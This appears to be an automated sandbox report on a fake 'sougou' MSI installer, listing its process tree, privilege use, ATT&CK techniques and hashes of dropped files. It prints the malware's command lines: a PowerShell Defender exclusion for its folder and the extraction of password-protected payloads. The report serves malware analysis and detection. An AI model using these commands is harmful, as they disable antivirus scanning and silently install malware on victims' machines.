Token: SeRestorePrivilege	1796	msiexec.exe
Token: SeShutdownPrivilege	1796	msiexec.exe
Token: SeDebugPrivilege	1796	msiexec.exe
Token: SeAuditPrivilege	1796	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1796	msiexec.exe
Token: SeChangeNotifyPrivilege	1796	msiexec.exe
Token: SeRemoteShutdownPrivilege	1796	msiexec.exe
Token: SeUndockPrivilege	1796	msiexec.exe
Token: SeSyncAgentPrivilege	1796	msiexec.exe
Token: SeEnableDelegationPrivilege	1796	msiexec.exe
Token: SeManageVolumePrivilege	1796	msiexec.exe
Token: SeImpersonatePrivilege	1796	msiexec.exe
Token: SeCreateGlobalPrivilege	1796	msiexec.exe
Token: SeBackupPrivilege	1000	vssvc.exe
Token: SeRestorePrivilege	1000	vssvc.exe
Token: SeAuditPrivilege	1000	vssvc.exe
Token: SeBackupPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeRestorePrivilege	1068	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: 35	1068	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: SeSecurityPrivilege	1068	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: SeSecurityPrivilege	1068	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: SeRestorePrivilege	4108	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: 35	4108	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: SeSecurityPrivilege	4108	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: SeSecurityPrivilege	4108	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe
Token: SeRestorePrivilege	448	msiexec.exe
Token: SeTakeOwnershipPrivilege	448	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1796	msiexec.exe
1796	msiexec.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 448 wrote to memory of 1476	448	msiexec.exe	103
PID 448 wrote to memory of 1476	448	msiexec.exe	103
PID 448 wrote to memory of 1396	448	msiexec.exe	105
PID 448 wrote to memory of 1396	448	msiexec.exe	105
PID 1396 wrote to memory of 4388	1396	MsiExec.exe	106
PID 1396 wrote to memory of 4388	1396	MsiExec.exe	106
PID 1396 wrote to memory of 1132	1396	MsiExec.exe	108
PID 1396 wrote to memory of 1132	1396	MsiExec.exe	108
PID 1132 wrote to memory of 1068	1132	cmd.exe	110
PID 1132 wrote to memory of 1068	1132	cmd.exe	110
PID 1132 wrote to memory of 1068	1132	cmd.exe	110
PID 1132 wrote to memory of 3748	1132	cmd.exe	111
PID 1132 wrote to memory of 3748	1132	cmd.exe	111
PID 1132 wrote to memory of 4108	1132	cmd.exe	115
PID 1132 wrote to memory of 4108	1132	cmd.exe	115
PID 1132 wrote to memory of 4108	1132	cmd.exe	115
PID 1396 wrote to memory of 3764	1396	MsiExec.exe	117
PID 1396 wrote to memory of 3764	1396	MsiExec.exe	117
PID 1396 wrote to memory of 3764	1396	MsiExec.exe	117
PID 1396 wrote to memory of 5024	1396	MsiExec.exe	119
PID 1396 wrote to memory of 5024	1396	MsiExec.exe	119
PID 1396 wrote to memory of 5024	1396	MsiExec.exe	119
PID 1672 wrote to memory of 3244	1672	PpMCUaskmPAB.exe	129
PID 1672 wrote to memory of 3244	1672	PpMCUaskmPAB.exe	129
PID 1672 wrote to memory of 3244	1672	PpMCUaskmPAB.exe	129
PID 3244 wrote to memory of 4852	3244	yrjwPObnoqyg.exe	132
PID 3244 wrote to memory of 4852	3244	yrjwPObnoqyg.exe	132
PID 3244 wrote to memory of 4852	3244	yrjwPObnoqyg.exe	132

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\sougou_setup.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1796

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:448
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:1476
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 2EEDA5845DA4D05B3205F13B6C07DA59 E Global\MSI0000
  2⤵
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\DriveHumbleTechnician'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4388
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe" x "C:\Program Files\DriveHumbleTechnician\YJgbLqUbskWexDENSZyOncyGkufCAI" -o"C:\Program Files\DriveHumbleTechnician\" -p"37709OJvgn~xO.H..>S=" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe" x "C:\Program Files\DriveHumbleTechnician\fCwpAyMuVRIFHFczCVKWCOKCaXKCyQ" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"182119:SRG:B.Wa.ph~}" -y
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:1132
  - - C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe
      "C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe" x "C:\Program Files\DriveHumbleTechnician\YJgbLqUbskWexDENSZyOncyGkufCAI" -o"C:\Program Files\DriveHumbleTechnician\" -p"37709OJvgn~xO.H..>S=" -y
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1068
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 2
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3748
  - - C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe
      "C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe" x "C:\Program Files\DriveHumbleTechnician\fCwpAyMuVRIFHFczCVKWCOKCaXKCyQ" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"182119:SRG:B.Wa.ph~}" -y
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4108
- - C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
    "C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 288 -file file3 -mode mode3
    3⤵
    - Drops file in Program Files directory
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3764
- - C:\Program Files\DriveHumbleTechnician\sougou.exe
    "C:\Program Files\DriveHumbleTechnician\sougou.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    PID:5024

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.vbs"
1⤵
- Modifies data under HKEY_USERS
PID:1776

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe
"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe" install
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Executes dropped EXE
PID:2564

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe
"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe" start
1⤵
- Drops file in Program Files directory
- Executes dropped EXE
PID:524

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe
"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe"
1⤵
- Drops file in Program Files directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1672
- C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
  "C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 272 -file file3 -mode mode3
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3244
- - C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
    "C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 62 -file file3 -mode mode3
    3⤵
    - Enumerates connected drives
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:4852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e583804.rbs

Filesize
7KB

MD5
ef29d8050b2eee12370d7822bbd56872

SHA1
cf5a23ef9ddd9b4ba319c8ed97a08e1875fc9733

SHA256
466814321de594181ff1a9fa34168f4324220ad0d47d84b007b6c80f7abaeb50

SHA512
9f96bb64734557874daf5e546b43cb9a902c203f3fa8e126a4a4c3dc80e3bfbfd7100610f7613a44d0d6234288bc073824a249290a47eb113c1e2b9a957a0d37

Download Submit
C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe

Filesize
2.1MB

MD5
d9a41a6ce1809032f7e409a79766fbe6

SHA1
c011b1122fb750ce3b393fc35df623d7fb21ebaa

SHA256
0099f9e565c7bb368d24fa3e497fb6cad33463ef13a02017f8d072bfb7185520

SHA512
23d324a40aca1ecc022a42646826632d43c67496722004fe155df7d76e1175a02a3a69595606d452834ad61cbc119fa4fe8c98b7a39845b4fefaece34d4a92e1

Download Submit
C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe

Filesize
832KB

MD5
d305d506c0095df8af223ac7d91ca327

SHA1
679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a

SHA256
923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66

SHA512
94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

Download Submit
C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.wrapper.log

Filesize
300B

MD5
3e73b93a37539b5c22c75e127c3602cd

SHA1
84946b988ff80666b1aa57a12df0d2b983964504

SHA256
ff9be0b6088f7ea383f625847637d05f40013bba114e3ae693d72d9f311e28d2

SHA512
8a7f573daaeb6a98496089332361d30a0d90d0398b2ea4d0262b2f4759bded96d600018c5263e111e6fe040a46731516cf587dc0c0cdd9bf4d947daf9a4b55dc

Download Submit
C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.wrapper.log

Filesize
473B

MD5
81c39b124f2fadbfd520b0858f2c23f5

SHA1
232f307749b6364493b23d2d0972898ee99077fd

SHA256
094615ecfd0219f0451ac0d310613cd34320a7ba52621b458bced18001cabb09

SHA512
b562362dfa4a7e483ab755558eafdf5807512840764b1e971592da1e54864c7a450b4187c7557021d81ea3536bff81272dfec84afeea9add40a8319bbefc7502

Download Submit
C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.wrapper.log

Filesize
656B

MD5
0e3267bbcb598fea1a322d5beec0d0e9

SHA1
daaaa68cc882bfa1836097c6fb146d75ece890b7

SHA256
0e27944828f7d20d8d1060affe85614398382d7b76244cba6ffbf68fcd977d49

SHA512
13219d730e9286140b4e1d828e66031d069fa152fbc125aa8595dadb249e4b573389ef7f131960269b2be075586c787ccc6d37f814c3baa4ee54d68124c294ed

Download Submit
C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.wrapper.log

Filesize
790B

MD5
820fdef5328f21b38e771f9077ec45cb

SHA1
059bd1ac9fe0fc0c532fa1d3769d48ff39138948

SHA256
76db81d5c0075f0e6b79ff7d1162df62273b257cca283b427644b1c20d12836a

SHA512
9db91557373f35a33f0bd34282194b00463437779be40673ac8f42d5dd39f2221d01761b9c64800e796ece29f35cc4eafaa5fec5f6744fd7119dee6ca0dc0e99

Download Submit
C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.xml

Filesize
445B

MD5
e52022c707c44b73469961b596661b68

SHA1
127ce698f030787073acb314d1f58d0ba7c28e0c

SHA256
6430071f672054385dbcd25baee94eeafb5b82c51c279cb8f816e9082c0088ff

SHA512
4cc2c33eed3d7011561c155d3f9e90516be900d26a20fa68674b7c9a8298c6acad707575faf79e2d98b808481ac550bc5a90fe008f9b88f12d53c1ec196a48e5

Download Submit
C:\Program Files\DriveHumbleTechnician\YJgbLqUbskWexDENSZyOncyGkufCAI

Filesize
1.5MB

MD5
96b8cac1192eacf6ca4f258a8668c410

SHA1
a92f95201110d3aabad4aeb29ae3c12abbdb5066

SHA256
f3d900a4ec1b331e7f29d56d6fb1617d5a8ad606cc9b0264d63961dbea99fb44

SHA512
147fd5be2a731fb5f2edb9b0d00300daf12d476db068918c98c7c71ed022b0a22d9fee6a70183e6afc541e3cad9a86da9f54811a328713eb0698eebdbfee0f19

Download Submit
C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe

Filesize
577KB

MD5
c31c4b04558396c6fabab64dcf366534

SHA1
fa836d92edc577d6a17ded47641ba1938589b09a

SHA256
9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3

SHA512
814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

Download Submit
C:\Program Files\DriveHumbleTechnician\fCwpAyMuVRIFHFczCVKWCOKCaXKCyQ

Filesize
1.5MB

MD5
362ccedbb2427712ed515c837ad28813

SHA1
95340d7edd1c26fd7ea3f3ff5a41921c29be7190

SHA256
f881d7523aaec5dd3d96e2e9c6439ff703d57722d4061073b7321eda37c02329

SHA512
2d037cafb48c69bcc91c712a82110a4b2820f1ae1cba76011673f8159e283b98a2f7c59278c26cc8349b4b1c1a28e6711702f159ac316e138b1816908f92d75c

Download Submit
C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.vbs

Filesize
2KB

MD5
520a9fbf61757e655381fe3638d5123e

SHA1
31e1912d044d5f1ba205823809d175a6ad1b52e6

SHA256
ee4b4f26b8d36ba2ec844f526c18715841236aaa7fed06b9018ba9aa34a5a413

SHA512
3888d4407f796984a95dae37aca58c4c855540244d33a69563bd55d36ab43d59440f94c7097e0661d016eb0c9f96d1ca0e7cc43a04e4cb6026135812170caca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djwixb2m.h3c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\HWSignature.dll

Filesize
138KB

MD5
154aea6ca8875fe8023f5f0554adbe60

SHA1
54a6c770e4ab3aef95782f1bc647ab664163d42f

SHA256
e035633d5a97dbc492d125a379a198ddadb09547d4b576552016e690a573e339

SHA512
93063a15acf077e0de9634eef68d21a3243be36a3a02f44065cac7c279ddc06a9a9e2ea5ef8f5d70662d6b9a710f988a0455b78aa8f8092155acfd359ae976ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\ImageMagik.dll

Filesize
5.9MB

MD5
745007cd039d16bbbe05e308c223c8b0

SHA1
f3fc435a325118cbb4af4219bc41755c245afe54

SHA256
b550ed8935bbc51571aabfb5c3130d295909df89e7c4c1e204f219d88a652332

SHA512
40d1146fd001f138d0ecd0516078364947f180431bec36a689e03e5fadd4851ec5b6cd5862fc1702231c5a442c1be4bf6c0d759ca333f939cd74d55fc64cad74

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\InstallOptions.dll

Filesize
15KB

MD5
34d24e6ecdfb6859096816436c5875da

SHA1
a4504b5eccc48ce867623dd1d081a760ab70a12f

SHA256
734d6299964cab87eeeb5f8c7e5bdf6aa8c3e29d938fdd1ada6addcd5006de28

SHA512
cf163ef71ed297259371d5bb352f8b0ef5e8bab9ad2168a26714e2d9f9037af87ec48b7e983b9fa9dc3f478c02cc0775583d52aca7604f3ac1e4a8882b3ecad9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\SetupLib.dll

Filesize
6.0MB

MD5
b713d9c939fe455aea4be2eb94215730

SHA1
c51af6b0be8452f77056d7a4a8554c8cb21c6ddb

SHA256
7dd85f1d4725ff05c35b6c0632992523a3f1cadb6294f516ef2528738b3a53af

SHA512
1185b1002c85aa832f380e81a45d50b0a6b44d9b87eefc1a0325c0dfbf921d2b9f531c81d564723874f555a10e2516fa1e6bd91a7e473893083998a57b8e2fed

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\SetupLibNew.dll

Filesize
3.9MB

MD5
72fb079823f0e6c80caff804cf626ca9

SHA1
464ae7293affcadd0aafec8a52635bcc92047e55

SHA256
23a25b73fd5d66aef3abc0c90b1eeff2fd3921a7d49aa69891e926139969b31e

SHA512
431d0e3469785981760185b38813148154fecb82abe37431c0591873e462ad597ad1449c29f3619b10f4435c08bbe231877f8debf9c48a26f258c5fef16b52c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\System.dll

Filesize
11KB

MD5
c51fc979c1c3e17bece7bd194aeb6ea2

SHA1
9a5d000d6393f2980062b4cc6e8f543493b1be8f

SHA256
93a8e95708882e56250ae55aef93417333b2dbe7ea99590abed34cdca2227e61

SHA512
716cdeb890307ff42901464dd24aa94e29415ef20d4e975c2733e34330fdf85edfd4ad9e00878edbe98921deebe44153279cb95acb309c5e1812026716dcdc4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\ioSpecial.ini

Filesize
958B

MD5
b91f23e23afa7dc3cdd23035e37cfd8c

SHA1
0dfb4abe3b0033f086cfb7641b7bac61ab40bc02

SHA256
de739cb211824d6d09e0e4c812793d39c7a097736ca66b97c36f66504345545f

SHA512
80b2da6b23e15f934b4dbcac017d43141962f78ad61a411d8a95c57a95a9d1ff881e50feef909a4eab8f45438a97b9ab39fa4d117462e1906c49b1d41918a091

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\ioSpecial.ini

Filesize
1KB

MD5
45fe2cb12e2463a152d312949580eca1

SHA1
fb543b94f994d3c54db84e50fb05a5b27c96b461

SHA256
a10d17f65ef1a25591fbfcb3fd2f0310f71adb97ee4a236dc8f0bc8a506314a0

SHA512
069d63369a875d2b89c9d3abb98b4f53298160f9814de1734c20ba91cf4891c2abee259d1cba067125496a5e453c62bfc6c3047ee19daf3729f1fd60300dc0c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy6704.tmp\validate.ini

Filesize
87B

MD5
59da6b50ff42da1a3230fbca1bd90e11

SHA1
6870be998befa4bf02e8824e0a101303fe76ef4f

SHA256
5f60c14e1d82e49f4dd48c648c31bd572adf7a6e236aa7b2a8854bbc90d21c4a

SHA512
e3e7061e1ca6d8ce0ebca216d88988247cb6b824b19fe2ed1fd4dfb19bdbb9d231655b378d0990cc51b3df82183cbb28818f60d2efb9cb40daf58ef183ba2a19

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PpMCUaskmPAB.exe.log

Filesize
1KB

MD5
122cf3c4f3452a55a92edee78316e071

SHA1
f2caa36d483076c92d17224cf92e260516b3cbbf

SHA256
42f5774d1ee4cae5d7a4e83970da42bb17e61ae93c312247211b5ee3535662e0

SHA512
c98666fb86aaff6471c0a96f12f037b9a607579c5891c9d7ba8cd4e90506ca7aa5b5f6264081d25f703c88fb69d8e2cd87809d508e771770550d0c5d4d17d91c

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
24.1MB

MD5
8e2207bd7b94923f52dbc9bf7f9f9c1e

SHA1
c2f363b0461afd606be30f681517edcdfbe1724e

SHA256
9fef84d1ab94df1b15e01b6faa9d0a73d0ca3ae1e255c2bf38d96ba515804ce5

SHA512
3ea2d06cc36500015629c91f265c8a3c6925f72c9d05e546e78888d6c759a191395a15d1d9acc5892142c996d6896c0a2e4cd24eb105d5acfa19d6ae09cdd355

Download Submit
\??\Volume{0576a638-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{0965a205-d6a6-4453-9f4b-71ac7f4093fe}_OnDiskSnapshotProp

Filesize
6KB

MD5
dda9ff163dc013df86a66c454c806d9c

SHA1
a67c5708a56b64887b6902f941645ea19c84844c

SHA256
1fdf4b19511c9ac354c7cf2acc1092470bb946fbfe48a0765809f4f02d910280

SHA512
551acdf4793af72439be4300a2849f6555886d586251cdfb8727aeb4f6a5aae6dcce799f219b4dc59f4f8d3a8345626cba77d892e537308aeb9b019ed8fcb5d3

Download Submit
memory/2564-74-0x0000000000990000-0x0000000000A66000-memory.dmp

Filesize
856KB

Download
memory/3764-52-0x000000002A1C0000-0x000000002A1EF000-memory.dmp

Filesize
188KB

Download
memory/4388-22-0x000002D961EE0000-0x000002D961F02000-memory.dmp

Filesize
136KB

Download
memory/4852-239-0x000000002A0C0000-0x000000002A10D000-memory.dmp

Filesize
308KB

Download
memory/4852-240-0x000000002BCE0000-0x000000002BE9D000-memory.dmp

Filesize
1.7MB

Download
memory/4852-242-0x000000002BCE0000-0x000000002BE9D000-memory.dmp

Filesize
1.7MB

Download
memory/4852-243-0x000000002BCE0000-0x000000002BE9D000-memory.dmp

Filesize
1.7MB

Download
memory/4852-244-0x000000002BCE0000-0x000000002BE9D000-memory.dmp

Filesize
1.7MB

Download
memory/5024-219-0x0000000000400000-0x00000000006DD000-memory.dmp

Filesize
2.9MB

Download
memory/5024-88-0x000000006E920000-0x000000006E930000-memory.dmp

Filesize
64KB

Download
memory/5024-95-0x00000000037D0000-0x0000000003BC6000-memory.dmp

Filesize
4.0MB

Download
memory/5024-54-0x0000000000400000-0x00000000006DD000-memory.dmp

Filesize
2.9MB

Download
memory/5024-104-0x000000006E910000-0x000000006E920000-memory.dmp

Filesize
64KB

Download
memory/5024-115-0x0000000003F10000-0x0000000003F35000-memory.dmp

Filesize
148KB

Download